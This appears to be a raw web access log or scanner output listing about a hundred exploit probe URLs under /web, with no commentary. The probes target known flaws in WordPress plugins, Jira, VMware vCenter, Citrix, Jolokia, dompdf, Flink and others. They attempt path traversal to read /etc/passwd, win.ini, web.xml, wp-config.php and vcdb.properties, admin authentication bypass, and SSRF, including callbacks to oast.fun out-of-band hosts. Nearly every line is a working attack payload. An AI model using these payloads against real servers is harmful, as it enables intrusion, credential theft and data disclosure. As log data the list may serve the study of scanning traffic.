/web
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/maint/index.php?packages
/web/fileDownload?action=downloadBackupFile
/web/druid/indexer/v1/sampler?for=connect
/web/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/web/
/web/
/web
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/maint/index.php?packages
/web/fileDownload?action=downloadBackupFile
/web/css_parser.php?css=css_parser.php
/web/fileDownload?action=downloadBackupFile
/web/fileDownload?action=downloadBackupFile
/web/css_parser.php?css=css_parser.php
/web/fileDownload?action=downloadBackupFile
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/solr/admin/cores?wt=json
/web/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/interlib/report/ShowImage?localPath=C:\Windows\system.ini
/web/?aam-media=wp-config.php
/web/solr/admin/cores?wt=json
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/public/index.php/home/file/user_pics
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/?a=display&templateFile=README.md
/web/ispirit/interface/gateway.php
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/s/25SmlCBaB8RLQLGPa4rDrRd5R0O/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/public/index.php/home/file/user_pics
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/ispirit/interface/gateway.php
/web/rest/tinymce/1/macro/preview
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/rest/tinymce/1/macro/preview
/web/s/25SmlHixpZ5O63a6hC6oebbxPGn/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/phpwiki/index.php/passwd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/jars/upload
/web/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/web/?url=http://0177.0.0.1/server-status
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/?host=http://0177.0.0.1/server-status
/web/filemanager/upload.php
/web/casmain.xgi
/web/fcgi-bin/wgsetcgi
/web/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/web/
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/language/lang
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/filemanager/upload.php
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/menu/neo
/web/casmain.xgi
/web/menu/stc
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/fcgi-bin/wgsetcgi
/web/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/dompdf.php?input_file=dompdf.php
/web/language/lang
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/menu/stc
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/dompdf.php?input_file=dompdf.php
/web/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/lib/dompdf/dompdf.php?input_file=dompdf.php
/web/includes/dompdf/dompdf.php?input_file=dompdf.php
/web/login
/web/cgi-bin/webproc
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/web/login
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acfe99m8v8pj25eurgcekcomayyyyyr.oast.fun
/web/?qtproxycall=http://c8acfe99m8v8pj25eurgcekcomayyyyyg.oast.fun
